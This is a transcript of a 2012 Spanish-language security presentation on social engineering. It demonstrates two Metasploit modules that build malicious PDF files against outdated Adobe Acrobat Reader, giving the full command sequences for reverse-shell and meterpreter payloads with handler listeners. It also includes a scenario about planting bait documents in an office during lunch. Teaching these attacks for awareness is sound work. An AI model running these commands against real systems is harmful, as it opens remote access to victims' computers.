social engineering and adobe acrobat reader - | blog …-acroba… · – ingeniería social: ......
TRANSCRIPT
http://www.el-palomo.com – http://www.facebook.com/El.Palomo.Seguridad.Informacion
Ingeniería Social: Uso de Metasploit para
vulnerar files Acrobat Reader
Omar Palomino Julio, 2012
Social Engineering and Adobe Acrobat Reader
• Ing. Sistemas y Maestrista de Ing. de
Computación y Sistemas, CEH,
Security+, ITIL v3.
• Consultor en seguridad de
información.
• Psicólogo que aun no comienza sus
estudios….
• Escritor en mis tiempos libres:
http://www.el-palomo.com http://www.facebook.com/El.Palomo.Seguridad.Informacion
http://www.el-palomo.com – http://www.facebook.com/El.Palomo.Seguridad.Informacion
Método 01: Vulnerabilidad adobe_cooltype_sing
Método 02: Vulnerabilidad
adobe_pdf_embedded_exe
Conclusiones y recomendaciones
AVISO Y CONSIDERACIONES LEGALES
Las técnicas mostradas en la presentación tienen por objetivo CONOCER las técnicas utilizadas por los hackers para penetrar y adueñarse de información no autorizada.
La presentación NO TIENE POR OBJETIVO enseñar técnicas para realizar robo de información mediante ingeniería social, el robo de la misma es penada según la legislación de cada país.
El autor no se hace responsable del mal uso de las técnicas mostradas en la presentación.
http://www.el-palomo.com – http://www.facebook.com/El.Palomo.Seguridad.Informacion
Presupuestos para realizar el ataque:
http://www.el-palomo.com – http://www.facebook.com/El.Palomo.Seguridad.Informacion
Todas las personas de la organización utilizan Adobe Acrobat Reader para revisar los archivos PDF.
He notado que la organización tiene cerca de 800 computadoras y el proceso de
actualización de Adobe Acrobat Reader sólo se realiza cuando se formatea la misma. También he notado que muchas personas no cierran las puertas de sus oficinas durante
el horario de almuerzo y que la secretarias suelen dejar documentos o notas en los escritorios de los colaboradores de la organización en cualquier momento del día.
Finalmente, he evaluado que la hora más fácil de acceder al edificio de la organización es
entre la 13:00 horas y las 13:15 horas, debido a que un número importante de personas entra y sale del edificio por la hora de almuerzo, haciendo imposible el control de personas que ingresan y salen de las instalaciones.
Método 01: Vulnerabilidad adobe_cooltype_sing
Método 02: Vulnerabilidad
adobe_pdf_embedded_exe
Conclusiones y recomendaciones
Método 01: Adobe_cooltype_sing (CVE-2010-2883)
http://www.el-palomo.com – http://www.facebook.com/El.Palomo.Seguridad.Informacion
COMANDOS A UTILIZAR:
msf> search adobe_cooltype msf> use windows/fileformat/adobe_cooltype_sing msf> info msf> show options msf> set filename contrato.pdf msf> set PAYLOAD windows/meterpreter/reverse_tcp msf> set LHOST 192.168.220.128 msf> exploit “Aquí ocurre lo mas importante… la ingeniería social”
# msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=192.168.220.128 E
Método 01: Vulnerabilidad adobe_cooltype_sing
Método 02: Vulnerabilidad
adobe_pdf_embedded_exe
Conclusiones y recomendaciones
Método 02: Adobe_pdf_embedded_exe (CVE-2010-2883)
http://www.el-palomo.com – http://www.facebook.com/El.Palomo.Seguridad.Informacion
COMANDOS A UTILIZAR:
msf> use exploit/windows/fileformat/adobe_pdf_embedded_exe msf> set INFILENAME metasploit.pdf msf> set PAYLOAD windows/shell/reverse_tcp msf> set LHOST 192.168.220.128 msf> exploit “Aquí ocurre lo mas importante… la ingeniería social”
msf> use exploit/multi/hanlder msf> set PAYLOAD windows/shell/reverse_tcp msf> set LHOST 192.168.220.128 msf> exploit
Método 01: Vulnerabilidad adobe_cooltype_sing
Método 02: Vulnerabilidad
adobe_pdf_embedded_exe
Conclusiones y recomendaciones
Conclusiones y recomendaciones
http://www.el-palomo.com – http://www.facebook.com/El.Palomo.Seguridad.Informacion
La ingeniería social es una manera muy efectiva de acceder a información no autorizada y se aprovecha del factor más débil de la seguridad: LAS PERSONAS.
La única manera de prevenir ataques de ingeniería social es: la concientización
continua de seguridad de información al personal de una organización. Se debe contar con un procedimiento definido para las actualizaciones continuas de
software instalado en el computador, para este ejemplo, Acrobat Reader.
http://www.el-palomo.com – http://www.facebook.com/El.Palomo.Seguridad.Informacion
Ingeniería Social: Uso de Metasploit para
vulnerar files Acrobat Reader
Omar Palomino Julio, 2012
Social Engineering and Adobe Acrobat Reader